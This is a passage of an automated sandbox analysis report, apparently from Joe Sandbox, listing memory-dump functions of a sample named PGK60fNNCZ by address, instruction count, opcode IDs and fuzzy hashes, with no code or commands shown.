                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 66980dc7972ac05e86986569e74708c6450cad2a89af686f67244f7f63453b4e
                                                            • Instruction ID: d7be3fcd7c25ab9efa79227848495b2d48d00f908c5ef518b063f00149bbe1a8
                                                            • Opcode Fuzzy Hash: 66980dc7972ac05e86986569e74708c6450cad2a89af686f67244f7f63453b4e
                                                            • Instruction Fuzzy Hash: 9401E834E09108EFEB04DFA9C685AE9BBFEAB49300F55C494E5099B361DA74DE41DB40
                                                            Function 059B9284 Relevance: .0, Instructions: 40COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1678961eaa952942782b9226fcbc559d4e0255944eeef3cb9605889fc2011316
                                                            • Instruction ID: e20cd8a24b60b513906dd4eb5ac423e7cfbf8a05c7b9c4ce110778cfaddf4429
                                                            • Opcode Fuzzy Hash: 1678961eaa952942782b9226fcbc559d4e0255944eeef3cb9605889fc2011316
                                                            • Instruction Fuzzy Hash: CDF0F02660F3D05FEB1303B76D202A67FB9DD8751130940CBE186CB2A3D99D4D0983B2
                                                            Function 059BE7D8 Relevance: .0, Instructions: 39COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6a510a04482d03173e57fb64fbcdf66834e3fd9cb6d9a0dd483a4fc44daa7b7e
                                                            • Instruction ID: 0b853125a5398adb5ea99fa0b9dc3d8494cd00c7667406d33b2ba5c4163a3ad8
                                                            • Opcode Fuzzy Hash: 6a510a04482d03173e57fb64fbcdf66834e3fd9cb6d9a0dd483a4fc44daa7b7e
                                                            • Instruction Fuzzy Hash: 03F0AF30D0D658DBF704CF55C6849F8BBBEAF4A300F04DAA4D0095B212DBB49E45DB81
                                                            Function 059B1428 Relevance: .0, Instructions: 39COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2a56b0d34414e4d16026abb1d7d155ecc8c1a1dc162abe78e37946efc7755f4f
                                                            • Instruction ID: e26f3aa7216783007ef5d479624cdec9a223a8b394935a5c2720917bf771a5cb
                                                            • Opcode Fuzzy Hash: 2a56b0d34414e4d16026abb1d7d155ecc8c1a1dc162abe78e37946efc7755f4f
                                                            • Instruction Fuzzy Hash: EB01D63291060A9BCF00AFA4D8448DAFB7AFFC9304F008629E00527210E774A599CB90
                                                            Function 059B8E00 Relevance: .0, Instructions: 35COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b1f3720bf9d1683cf91ae20302cbc61c268d253a26b0b1dc739a3bbf925a8b9c
                                                            • Instruction ID: c176deee95fa2208c27d631b40026dad66aa328965508c55cbef0c2b8aaa9a3c
                                                            • Opcode Fuzzy Hash: b1f3720bf9d1683cf91ae20302cbc61c268d253a26b0b1dc739a3bbf925a8b9c
                                                            • Instruction Fuzzy Hash: 98F0F674E4424AEFF700DF74CA08BDEBFB5AB48258F148999D025EB251DBF946018F80
                                                            Function 059B6D18 Relevance: .0, Instructions: 34COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 237deb8e6f849e9bee61e8c503070fd71d50ac8ef599d79b5da51bbdc15ba368
                                                            • Instruction ID: 41782534983e3ea7342c0e3d8b4642dac01bfad30db0abd94c5b35485c2c03e2
                                                            • Opcode Fuzzy Hash: 237deb8e6f849e9bee61e8c503070fd71d50ac8ef599d79b5da51bbdc15ba368
                                                            • Instruction Fuzzy Hash: 41F012326041186FEF08DF98D945ADE7FAAEB84250F14C17AE408D7315E771E9519790
                                                            Function 059BDAD6 Relevance: .0, Instructions: 34COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 33fa09fbb1488d108f11029ca15d38adf03c663ee361e312b2a9e0ab4db3284b
                                                            • Instruction ID: 8554393173d8d1b7b7bf1520de5207f0965d093b7bd7ccc724640cc46ca37577
                                                            • Opcode Fuzzy Hash: 33fa09fbb1488d108f11029ca15d38adf03c663ee361e312b2a9e0ab4db3284b
                                                            • Instruction Fuzzy Hash: 8DF087B5D09208CFEB00CF96E8403CEFFBAFF88304F10C16AD0196A251D77108098B90
                                                            Function 059B8E59 Relevance: .0, Instructions: 33COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c4b79541e69e450538a07f0f38c52ea7bc02d2f50f41e51b48bbdcc7b7fd5898
                                                            • Instruction ID: 7a9692a07da0a0cc36752d2623d2cef730ed9d753af2353d9c59bd901d7684ee
                                                            • Opcode Fuzzy Hash: c4b79541e69e450538a07f0f38c52ea7bc02d2f50f41e51b48bbdcc7b7fd5898
                                                            • Instruction Fuzzy Hash: 53F01DB4D0434AAFEB44EFA9C805ABFBFF9EB48304F514869E515E7200E77595408BA0
                                                            Function 059BEF18 Relevance: .0, Instructions: 32COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c6ab2d673196f1c70e2a6c4f4ffd8523f2893c82d086bf0c9cbbfbe9232a882d
                                                            • Instruction ID: 74bac9a3cb5383db8f42859b3fc0f5a1f045821febc5ac264b474b71baaa8539
                                                            • Opcode Fuzzy Hash: c6ab2d673196f1c70e2a6c4f4ffd8523f2893c82d086bf0c9cbbfbe9232a882d
                                                            • Instruction Fuzzy Hash: F301FB74D05209AFDB40DFA8D5445AEFBF9BF08311F108195E854E7380D7349A40CBA1
                                                            Function 059B2D38 Relevance: .0, Instructions: 29COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f7664f0db1a30351490a33c05cce51ea0bbd4eb3a5223efdbc925d11f8127fe3
                                                            • Instruction ID: 0ec1e14080fd0723b5aff35d934f5630a36a860b350b3059451452e942d59eb1
                                                            • Opcode Fuzzy Hash: f7664f0db1a30351490a33c05cce51ea0bbd4eb3a5223efdbc925d11f8127fe3
                                                            • Instruction Fuzzy Hash: 85E0ED72B006645B9709EBBAB41486AF6EBAEC8710324C57ED50D87625ED7199014A84
                                                            Function 059B8E68 Relevance: .0, Instructions: 29COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b5d2995f442e026ad6354507e834e9352274ce6f8d6ea81e560b93bf61425daf
                                                            • Instruction ID: da454444319ba59d89c37b21363cedf4cf056dc627b9a353325fba7570e31239
                                                            • Opcode Fuzzy Hash: b5d2995f442e026ad6354507e834e9352274ce6f8d6ea81e560b93bf61425daf
                                                            • Instruction Fuzzy Hash: 76F0D0B0D042099FEB44DFA9C5416BEBBF8FB4C304F104599D918E7300D77595048F90
                                                            Function 059BC52B Relevance: .0, Instructions: 24COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 26ea2672b2b38a90c5bbce1953dd7e30d75d03f2aa55c26abde9a8d5469e36f0
                                                            • Instruction ID: 607d14299509e95b057a3e517c9f18a364313dae94e9b5a9dd60d45f89847d86
                                                            • Opcode Fuzzy Hash: 26ea2672b2b38a90c5bbce1953dd7e30d75d03f2aa55c26abde9a8d5469e36f0
                                                            • Instruction Fuzzy Hash: B6E03070E0A20ACFFB14CB95DBC46EC77F7EB89200F1059A99009A3255C6B01E44CA02
                                                            Function 059B2D28 Relevance: .0, Instructions: 24COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c57876452d684ddae3df2dd81f9a80587620c13396430ae5e2d25e0bf817df4b
                                                            • Instruction ID: f1d13f9adfcb6753a5c0610dfe5cae3598b65c95bb55904b4d15004b9ec2a1b9
                                                            • Opcode Fuzzy Hash: c57876452d684ddae3df2dd81f9a80587620c13396430ae5e2d25e0bf817df4b
                                                            • Instruction Fuzzy Hash: 10E026722006104FE715A62ABC10557BAAFAFC9200314C52EC80987205E961A8020AC4
                                                            Function 059B5E07 Relevance: .0, Instructions: 23COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8634a9b52e6e40ca29ea528866e11bdeb9080ee3bb8c584bbd292efe3d4df037
                                                            • Instruction ID: a16d32e816a07abb51730569b4516a2288dc3845ec631e684cd6d6a4cefbcf63
                                                            • Opcode Fuzzy Hash: 8634a9b52e6e40ca29ea528866e11bdeb9080ee3bb8c584bbd292efe3d4df037
                                                            • Instruction Fuzzy Hash: 9EE02B777892001FF6734664A91C3F53B65DBD281AB8606F7C606C7314F556D403C622
                                                            Function 059B4F99 Relevance: .0, Instructions: 21COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 469f23c83a68c661d8b9d2f3cc5ded6156b2ade03c7cdc965fdbac2b31dc0b78
                                                            • Instruction ID: 07527df080294b95d15898aedc3089f3f3b9cd5bdcceba35e06a4a340d895562
                                                            • Opcode Fuzzy Hash: 469f23c83a68c661d8b9d2f3cc5ded6156b2ade03c7cdc965fdbac2b31dc0b78
                                                            • Instruction Fuzzy Hash: 0CE0EC1291ABA05FF616A3749C606CA3F538FE6712B158593A0848E097A439885F91BB
                                                            Function 059B0BC7 Relevance: .0, Instructions: 19COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 680d2b51552c24a2c7cc5d9ec8d755910a7c62238f641708a0f7c9324c25ad46
                                                            • Instruction ID: 20f0fb3d29fc76fe3c9b3a7415c1d6409c72c87d766070fb6ffbbd729010db35
                                                            • Opcode Fuzzy Hash: 680d2b51552c24a2c7cc5d9ec8d755910a7c62238f641708a0f7c9324c25ad46
                                                            • Instruction Fuzzy Hash: F8D02B331082547FCA03AB549C458C7FFAD9F56158F18C096F148CB122D212E525C7D1
                                                            Function 059B8E10 Relevance: .0, Instructions: 18COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2e8b72d0d4f7d87552bb5baadbaf1b9d7661cc3edbd1c173c4ea0fcffa5a2081
                                                            • Instruction ID: 55c84b4e68ea7a34c1579efa39237ec59133df1e76da14f7fb87a417f677e3ae
                                                            • Opcode Fuzzy Hash: 2e8b72d0d4f7d87552bb5baadbaf1b9d7661cc3edbd1c173c4ea0fcffa5a2081
                                                            • Instruction Fuzzy Hash: 00E0B6B0D40209DFE740EFB9CA05A9EBBF5BF08200F15C9A9D019E7211E7B596048F91
                                                            Function 059BDF30 Relevance: .0, Instructions: 17COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0095e7fee37674894af4c86003c0ff4a67b359cf6a77d2cd31f171e087e51896
                                                            • Instruction ID: 8099ee49e0c42cf66bdaccbe65331470df4cd6982bf4e65a721e49eb63f0b644
                                                            • Opcode Fuzzy Hash: 0095e7fee37674894af4c86003c0ff4a67b359cf6a77d2cd31f171e087e51896
                                                            • Instruction Fuzzy Hash: 4EF05278A46269DFEB21CF65D941FA8BBB1BB09300F1051E6E84DA7781D3749E80CF20
                                                            Function 059B6883 Relevance: .0, Instructions: 16COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5a29a40f73055ddf739591cf033c1df17f9fb2183edd5fd574e15b5eab85df53
                                                            • Instruction ID: fc88d7d3c85ddce925a2f2b1f517d0b210618d0e042dc4616e31f3b585a0c73d
                                                            • Opcode Fuzzy Hash: 5a29a40f73055ddf739591cf033c1df17f9fb2183edd5fd574e15b5eab85df53
                                                            • Instruction Fuzzy Hash: 4AD0C9767843041BEB1027B4A47A35D7791D784666F148079E84E8B3C5ED6A8803C266
                                                            Function 059B82B1 Relevance: .0, Instructions: 15COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ab60a40815240bd4fd988d1771b9601c34d7ce2aecaf35df00c7b94467bdfec1
                                                            • Instruction ID: d5c27e98dff757c00081260569b0c8e57ccae2efe32b2bd1465350cff52c7e85
                                                            • Opcode Fuzzy Hash: ab60a40815240bd4fd988d1771b9601c34d7ce2aecaf35df00c7b94467bdfec1
                                                            • Instruction Fuzzy Hash: 05D05EE1604619CFFB1107619929BA7395DBB8D24AF5840E6D90396A81DBA48402CB19
                                                            Function 059B8F08 Relevance: .0, Instructions: 14COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5779fe00a19401f10da431b362e1807a8a57a6c42c92179ddd4d01db8bd03b5c
                                                            • Instruction ID: 30ba7e7acaaf6555fb243a37ce5020a12fbb91f287f212a24dee34cfbc805da2
                                                            • Opcode Fuzzy Hash: 5779fe00a19401f10da431b362e1807a8a57a6c42c92179ddd4d01db8bd03b5c
                                                            • Instruction Fuzzy Hash: 3DD0123624020C9E6B40EEA5E900DA27BDDBB587403408472E504C7421E661F525E791
                                                            Function 059B0BD8 Relevance: .0, Instructions: 13COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1ee44bba3bde1158578db40c38daff3e06c8cd437e0adc6f22b81041c2910b02
                                                            • Instruction ID: 0c2a640b6cc431973d651c0f80dfe9264efbee9c49d13a025c6cde3cb62fbeeb
                                                            • Opcode Fuzzy Hash: 1ee44bba3bde1158578db40c38daff3e06c8cd437e0adc6f22b81041c2910b02
                                                            • Instruction Fuzzy Hash: 15C012322000187B4A01AB85D904CC7BBADAF89654314C056E5088B121D662F51697D0
                                                            Function 059BC1A2 Relevance: .0, Instructions: 12COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3e8bc6403f8659d2d738db9c74dff355cbefc8d7ae8b1c245f3ad71394a6d16f
                                                            • Instruction ID: d993d9a033cbf33d59fe72665128360905a214915841af0f0d83a1b9ca805011
                                                            • Opcode Fuzzy Hash: 3e8bc6403f8659d2d738db9c74dff355cbefc8d7ae8b1c245f3ad71394a6d16f
                                                            • Instruction Fuzzy Hash: 5AC0123107A2109BF7106BA8A60D2E43B65AB45252F480112F00B904B0CE614899C6A1
                                                            Function 059B6890 Relevance: .0, Instructions: 12COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3eefbd2242816f735417090c8bc57357ca3aee94c863fecfb078fa92d185f90e
                                                            • Instruction ID: fa6b30f3db5b84388eb213e0f6d7d85d54a4a252372c366152055d69fe68d4e6
                                                            • Opcode Fuzzy Hash: 3eefbd2242816f735417090c8bc57357ca3aee94c863fecfb078fa92d185f90e
                                                            • Instruction Fuzzy Hash: E5C08C757803080BEB1023B5A43971E76DAE7C462AF1040A9A80E873C5FD7A8C02C229
                                                            Function 059B7C10 Relevance: .0, Instructions: 11COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d96bb24b30dbc3c1cb973a7f2dd55705f09e28178ce6eafb9f19ea2e0d86bf5b
                                                            • Instruction ID: 3e41d5a184dde90cd5f3546376f8bb4d0882106cc95abe56596858c8917e3ddb
                                                            • Opcode Fuzzy Hash: d96bb24b30dbc3c1cb973a7f2dd55705f09e28178ce6eafb9f19ea2e0d86bf5b
                                                            • Instruction Fuzzy Hash: 61C09BE6F546050BF914513D4C7238F4391A38156CFD856985098DF3D9FE25D907D391
                                                            Function 059BC1A8 Relevance: .0, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 14ba0eaaf45a92aef4b70d759448a6297840275fa2a8c9c804824e18fd9f8843
                                                            • Instruction ID: 26edd1b0272161d76581951f01154a1ad2272e26e2d536dcfc01e61918ab6e8b
                                                            • Opcode Fuzzy Hash: 14ba0eaaf45a92aef4b70d759448a6297840275fa2a8c9c804824e18fd9f8843
                                                            • Instruction Fuzzy Hash: 2EC08C3006E3049BF300AB98A50E3643AAC7B01312F840010F10E404B08FA008C4CAB6
                                                            Function 059B8288 Relevance: .0, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 61264929e20a4d1af412c0aac1fade93dde824225db5ca3255b2a2ac362b7998
                                                            • Instruction ID: db3a01a6ae3144c859c83e96cd8fe2295ea60a229687059a8383d8e13aedc681
                                                            • Opcode Fuzzy Hash: 61264929e20a4d1af412c0aac1fade93dde824225db5ca3255b2a2ac362b7998
                                                            • Instruction Fuzzy Hash: 9CC08CE26C93880FE7224370283E20C6E616B8650679890C6D940DA382E824480A4712
                                                            Function 059B4D13 Relevance: .0, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a1557a8dd1cd306f8e693887f09774beb616cfd682382d20e0e5e5d16649fb64
                                                            • Instruction ID: 7fec2b53f9e45c6cb1a5feb1f83655004be776fa0794b208757c4410e768e6a4
                                                            • Opcode Fuzzy Hash: a1557a8dd1cd306f8e693887f09774beb616cfd682382d20e0e5e5d16649fb64
                                                            • Instruction Fuzzy Hash: F6C08C3814D1454FDB024F60CA493A43F22EF43318F2400E0D0808B29ACAA98513CB12
                                                            Function 059BDD67 Relevance: .0, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 361b58b2a1ffaac0c798cc62f2df8718dc1322d23206dba03aa3a3082cbc9118
                                                            • Instruction ID: 174f3a2023916719fbc2684f30b1fecc5e38572277fa8de2de3420c99c2a2dc7
                                                            • Opcode Fuzzy Hash: 361b58b2a1ffaac0c798cc62f2df8718dc1322d23206dba03aa3a3082cbc9118
                                                            • Instruction Fuzzy Hash: D4C08C7000E204CFE308CBB4C8854203B3DBF0B2123041CF984091A416CA315044CF22
                                                            Function 059B4FBC Relevance: .0, Instructions: 8COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 50a30bd224ebaa628e6a61fcaa8df610695fd4968a7efd1f3e125199e1c4d129
                                                            • Instruction ID: fb0fc1e9e98dea036a36acf24de5c9906bb8281702c85c371a591a4118c0adec
                                                            • Opcode Fuzzy Hash: 50a30bd224ebaa628e6a61fcaa8df610695fd4968a7efd1f3e125199e1c4d129
                                                            • Instruction Fuzzy Hash: BBB012352E4341B37400A2E48E68B6F5C13ABE1F00B10CC02320910012C6A0B42DE12F

                                                            Non-executed Functions

                                                            Function 06EE18F0 Relevance: .3, Instructions: 312COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1340778494.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: true
                                                            • Associated: 00000000.00000002.1340559054.0000000006E50000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e50000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 11ee1989e591a921570cc180bfcfedddd6238d30716577d756d09cfa5d142908
                                                            • Instruction ID: 310512c3145acccc02dcc289ebfb241e0771cfcdb812b3c1a5cc0bd4f70dc21f
                                                            • Opcode Fuzzy Hash: 11ee1989e591a921570cc180bfcfedddd6238d30716577d756d09cfa5d142908
                                                            • Instruction Fuzzy Hash: FAE1F8B4E002598FDB14DFA9C590AAEFBF2BF89305F248169D414AB359D730AD81CF60
                                                            Function 06EE0C48 Relevance: .3, Instructions: 312COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1340778494.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: true
                                                            • Associated: 00000000.00000002.1340559054.0000000006E50000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e50000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
